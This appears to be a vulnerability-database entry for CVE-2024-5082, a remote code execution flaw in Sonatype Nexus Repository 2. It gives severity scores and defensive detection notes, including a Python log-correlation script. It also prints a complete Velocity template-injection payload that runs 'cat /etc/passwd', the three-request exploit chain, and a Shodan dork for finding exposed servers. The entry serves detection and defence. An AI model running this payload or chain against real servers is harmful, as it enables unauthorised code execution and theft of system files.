CVE-2024-5082
published 2024-11-14


Priority: P2 · 77 · high · 7.1 (CVSS 4.0)
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 1.86% (76.6th percentile)
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository | 2.0.0 – 2.15.1 | |

Detection & IOCs (extracted from sources)

url: PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
url: PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml
url: GET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
command: #set($engine="") #set($run=$engine.getClass().forName("java.lang.Runtime")) #set($runtime=$run.getRuntime()) #set($proc=$runtime.exec("cat /etc/passwd")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end $output
path: /nexus/service/local/repositories/releases/content//.nexus/attributes/
other: contentGenerator: velocity
  • Exploit is a 3-step chain: (1) HTTP PUT of a Velocity-templated payload to a Maven metadata path, (2) HTTP PUT to the hidden /.nexus/attributes/ path setting contentGenerator to 'velocity', (3) HTTP GET to trigger server-side template rendering and retrieve RCE output.
  • Step 1 PUT must return HTTP 201 for the exploit chain to proceed; monitor for unexpected 201 responses to PUT requests on Nexus Maven metadata paths.
  • Step 2 sets the contentGenerator attribute to 'velocity' via a PUT to the /.nexus/attributes/ path — alert on PUT requests containing this path segment combined with the 'velocity' content generator value.
  • The Velocity SSTI payload uses java.lang.Runtime.exec() via reflection; detect Velocity template syntax (#set, #foreach, getClass().forName) in HTTP request bodies to Nexus endpoints.
  • Shodan dork for exposed Nexus Repository 2 instances: html:"Nexus Repository"
  • Successful exploitation returns /etc/passwd content (matching root:.*:0:0:) in the response body with Content-Type text/plain from the GET request.
  • The exploit requires valid credentials (Basic Auth) to authenticate to the Nexus Repository 2 instance; unauthenticated exploitation is not demonstrated in the template.
  • Affected versions are Nexus Repository 2 OSS/Pro up to and including 2.15.1 only; Nexus Repository 3 is a separate product and not affected by this CVE.
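
The request sequence in the notes above can be correlated from HTTP access logs per client and artifact path. The following is an added example, not taken from the sources this page quotes; the combined-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed access-log lines (combined-style); clients and artifact paths are made up.
SAMPLE_LOG = """\
198.51.100.7 - deploy [14/Nov/2024:10:00:01 +0000] "PUT /nexus/service/local/repositories/releases/content/org/example/app/maven-metadata.xml HTTP/1.1" 201 0
198.51.100.7 - deploy [14/Nov/2024:10:00:02 +0000] "PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/org/example/app/maven-metadata.xml HTTP/1.1" 201 0
198.51.100.7 - deploy [14/Nov/2024:10:00:03 +0000] "GET /nexus/service/local/repositories/releases/content/org/example/app/maven-metadata.xml HTTP/1.1" 200 1843
203.0.113.9 - ci [14/Nov/2024:10:05:00 +0000] "PUT /nexus/service/local/repositories/releases/content/org/example/lib/maven-metadata.xml HTTP/1.1" 201 0
203.0.113.9 - ci [14/Nov/2024:10:05:01 +0000] "GET /nexus/service/local/repositories/releases/content/org/example/lib/maven-metadata.xml HTTP/1.1" 200 412
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(PUT|GET) (\S+) HTTP/[\d.]+" (\d{3}) ')
CONTENT = re.compile(r'^/nexus/service/local/repositories/([^/]+)/content/+(.*)$')
ATTR_PREFIX = ".nexus/attributes/"
VELOCITY = re.compile(r'#set\s*\(|#foreach\s*\(|getClass\(\)\.forName')

def body_has_velocity(body):
    """True if a captured request body contains Velocity directives or reflection calls."""
    return bool(VELOCITY.search(body))

def find_chains(log_text):
    """Return (client, repo, artifact) keys where the three requests occur in order."""
    stage = defaultdict(int)  # key -> number of chain steps seen so far
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        c = CONTENT.match(m.group(3)) if m else None
        if not c:
            continue
        client, method, _, status = m.groups()
        repo, rest = c.groups()
        is_attr = rest.startswith(ATTR_PREFIX)
        artifact = rest[len(ATTR_PREFIX):] if is_attr else rest
        key = (client, repo, artifact)
        if method == "PUT" and not is_attr:
            # Step 1: metadata upload answered with 201
            if status == "201" and artifact.endswith("maven-metadata.xml"):
                stage[key] = 1
        elif method == "PUT" and stage[key] == 1:
            stage[key] = 2  # Step 2: write under /.nexus/attributes/ for the same artifact
        elif method == "GET" and not is_attr and stage[key] == 2:
            hits.append(key)  # Step 3: fetch of the uploaded artifact completes the chain
            stage[key] = 0
    return hits

if __name__ == "__main__":
    print(find_chains(SAMPLE_LOG))
```

Access logs rarely carry request bodies, so `body_has_velocity` is meant for a WAF or reverse-proxy hook that can see the PUT payload.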

CVSS provenance

nvd · v4.0 · 7.1 · HIGH · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck · 7.1 · HIGH